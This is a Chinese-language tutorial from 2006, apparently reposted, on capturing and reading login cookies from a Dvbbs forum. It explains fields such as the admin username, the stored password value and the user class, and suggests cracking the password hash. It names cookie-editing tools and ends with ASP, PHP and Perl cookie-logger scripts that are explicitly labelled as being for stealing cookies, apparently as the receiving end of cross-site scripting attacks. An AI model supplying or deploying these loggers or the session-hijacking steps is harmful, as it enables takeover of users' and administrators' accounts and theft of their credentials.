教你怎样从cookie里获取信息--cookie,获取,信息

作者：佚名来源：网上收集发布时间：2006-5-11 19:27:26

网站安全版有人在问，怎么从cookies中提取信息，我用动网论坛的来说明一下。

使用工具：
1：WsockExpert，用来抓取cookies。
2：动网论坛7.1 sp1。
抓取cookies步骤：打开动网论坛的页面，用户登陆以后，打开WsockExpert后点击“打开进程“，选择ie中的动网论坛的页面，然后再到动网页面中随便点击一个版块，这时候WsockExpert中就有显示了。

其中cookies信息是
DvForum=userid=1&usercookies=0&userhidden=2&password=ChXJBnM9970wE067&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=4517632; ASPSESSIONIDCATCRCBA=KLOBIMEDCHPOEKGAHMLPBLJK; upNum=0

参数说明
DvForum是动网论坛。
userid=1表示你的用户名的id是1，也就是这个论坛的第1个用户。
userhidden如果是1表示隐身，2表示上线。
Password这里是ChXJBnM9970wE067，并不是真正登陆密码的md5加密以后的值。ChXJBnM9970wE067其实就是数据库中的TruePassWord中的值。有些获取的cookies中这里可能是明文密码或者是md5加密以后的密码，能不能破解就看你的运气了。
userclass=%B9%DC%C0%ED%D4%B1，表示用户级别是管理员，当然其它的级别也是同样的原理。
username=admin就不用我说了吧。
upNum=0表示你上传的文件数量，如果每天上传数量有限制的话，修改这里可能有些cookies会有效的。

修改cookies的工具： minibrowser等可以修改cookies的工具。

盗取cookies的asp代码
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request.Servervariables("QUERY_STRING")
lP.SaveToFile server.mappath(strfilename),2
lP.Close
set lP=nothing
%>

盗取cookies的php代码
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$info=urldecode($info);
$fp = fopen("info.txt","a");
fwirte($fp,$info."\n\n\n\n");
fclose($fp);
}
?>

盗取cookies的cgi代码
#!/usr/bin/perl
# evil_cookie_logger.cgi
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
# cross-site scripting vulnerabilities.
#玄猫摘自http://www.infosecurity.org.cn/c ... ticle0128051326.htm

$borrowed_info = $ENV{'QUERY_STRING'};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

open(EVIL_COOKIE_LOG, ">>evil_cookie_log") or print "Content-type:
text/html\n\n something went wrong\n";
print EVIL_COOKIE_LOG "$borrowed_info\n";
print "Content-type: text/html\n\n";
close(EVIL_COOKIE_LOG);